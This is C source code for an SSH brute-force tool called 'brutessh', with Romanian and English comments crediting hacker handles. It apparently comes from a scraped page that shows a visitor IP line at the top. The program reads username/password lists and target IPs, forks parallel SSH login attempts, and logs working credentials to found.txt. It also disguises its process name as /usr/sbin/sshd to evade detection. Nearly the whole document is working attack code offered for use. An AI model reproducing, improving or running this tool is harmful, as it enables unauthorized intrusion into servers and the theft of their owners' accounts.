Your IP : 216.73.216.40
/*
* by FULG of #texter :)
* greetings to most famous Romanian h4x0rs :
* lover4you, ps, LordNikon, iptables, sonkeriki, starters, zorg, pentaguard
* rou:
* Ca sa il compilati trebuie sa aveti instalat
* http://packetstormsecurity.org/crypt/LIBS/ssh/libssh-0.1.tgz ;
* Dupa ce instalezi libssh cp /usr/local/lib/libssh.so /usr/lib/
* gcc -o brutessh fulg.c -I /usr/local/include -L /usr/local/lib/ -lssh -lpthread
*
* Mai multe bunatati pe www.fulg.home.ro !
* Editeaza pass.txt in felul urmator :
* user pass
* user2 pass2
* user3 pass3
*
* Ce face brutessh-ul nostru :
* - isi ascunde procesul in ps
* - poti sa il modifici sa iti execute comenzi pe serverul gasit :)
* - nu mai da erori segmault default , gata !
* - are culori frumoase si un mesaj si mai frumos pt unguri
*
* eng:
* some code ripped from zorg's brutessh.c
* -- this was private for 3 years!
* edit the pass.txt in the next format :
* user1 pass1
* user2 pass2
* user3 pass3
* Cheers.
* - it fakes the proccesss name in ps list
* - it gets users/password from a list
* - some bugfixes
* - optimized
* TODO:
* - fix some bugs
* - make it to execute commands on the host it hacks.
*
*/
#include <stdio.h>
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#define FAKE "/usr/sbin/sshd"
int flag,where;
int shell(SSH_SESSION *session){
struct timeval;
int err;
BUFFER *readbuf=buffer_new();
time_t start;
CHANNEL *channel;
channel = open_session_channel(session,1000,1000);
if(isatty(0)) // checking for tty
err=channel_request_pty(channel); // requesting pty
err= channel_request_shell(channel); // requesting shell
start=time(0); // start teh timer
while (channel->open!=0) // channel open ..
{
usleep(500000); // sleep
err=channel_poll(channel,0);
if(err>0){ // do we have a shell ?
err=channel_read(channel,readbuf,0,0); //read teh buffer in the channel
}
else
{
if(start+5<time(0))
{
return 1;
}
}
}
return 0;
}
/* here comes the nice part
* This function checks auth
*/
void checkauth(char *user,char *password,char *host) {
struct hostent *hp;struct in_addr *myaddr;
SSH_SESSION *session; // declare some session thingies
SSH_OPTIONS *options;
int argc=1;
char *argv[]={"none"};
FILE *vulnf,*nolog; // file where we log the shizz
where++;
alarm(10);
options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
session=ssh_connect(options);
if(!session) return ;
if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS) // if no shell, disconnect.
{
ssh_disconnect(session);
return;
}
if(shell(session)) // if we got a session, then we printf() it and log it =>
{
if(!flag){
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(host);
hp = gethostbyaddr((char *) myaddr,4,AF_INET);
if((hp!=NULL)){
vulnf=fopen("found.txt","a+");
fprintf(vulnf,"%s:%s %s | %s\n",user,password,host,hp->h_name);
printf("n Got: %s:%s %s | %s\n",user,password,host,hp->h_name);}
else{
vulnf=fopen("found.txt","a+");
fprintf(vulnf,"%s:%s %s | without host\n",user,password,host);
printf("n Got: %s:%s %s | without host\n",user,password,host);
}
// flag=1;
fclose(vulnf);
}
}
else{ // if ssh login is denied, printf() && log it
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(host);
hp = gethostbyaddr((char *) myaddr,4,AF_INET);
nolog=fopen("nosh.txt","a+");
if((hp!=NULL)){
fprintf(nolog,"%s %s %s | %s\n",user,password,host,hp->h_name);
printf("n nosh -> %s %s %s | %s\n",user,password,host,hp->h_name);}
else
{
fprintf(nolog,"%s %s %s | without host\n",user,password,host);
printf("n nosh -> %s %s %s | without host\n",user,password,host);}
fclose(nolog);
}
}
int main(int argc, char **argv)
{
FILE *fp,*passf;
char *c;
char buff[4096];
char *a[80196], nutt[4096], *temp, *t, *string;
malloc(sizeof(a));
malloc(sizeof(nutt));
int count = 0, i;
int numforks,maxf;
if((passf=fopen("passwd.lst","r")) == NULL)
{ // here we scan the pass file for users and passwords.
printf("[+] FATAL: Cannot find passwd.lst\n");
return -1;
}
while (fgets(nutt,2024,passf))
{
while (t = strchr (nutt,'n'))
*t = '.';
temp = strtok (nutt, " ");
string = strdup (temp);
a[count++]=string;
while (temp = strtok (NULL, " "))
{
string = strdup (temp);
a[count++]=string;
}
}
fclose(passf);
if(argc!=2)
{
printf("[+] SSH BruteForce 2013 powered by XphaN @ UnderNet\n");
printf("[+] %s <theards>\n",argv[0]);
printf("\n");
exit(0);
}
if((fp=fopen("ip.conf","r"))==NULL) exit(printf("[+] FATAL: Cannot open ip.conf\n"));
maxf=atoi(argv[1]);
strcpy(argv[0],FAKE); // fake the proccess name.
while(fgets(buff,sizeof(buff),fp))
{
c=strchr(buff,'n');
if(c!=NULL) *c='.';
if (!(fork()))
{
where=0;
// printf("--> attacking %s",buff);
for (i=0; i<count; i=i+2){
// printf("--> Trying %s:%s %sn",a[i],a[i+1],buff);
checkauth(a[i],a[i+1],buff); // try to auth
}
exit(0);
}
else
{
numforks++;
if (numforks > maxf)
for (numforks; numforks > maxf; numforks--)
wait(NULL);
}
}
}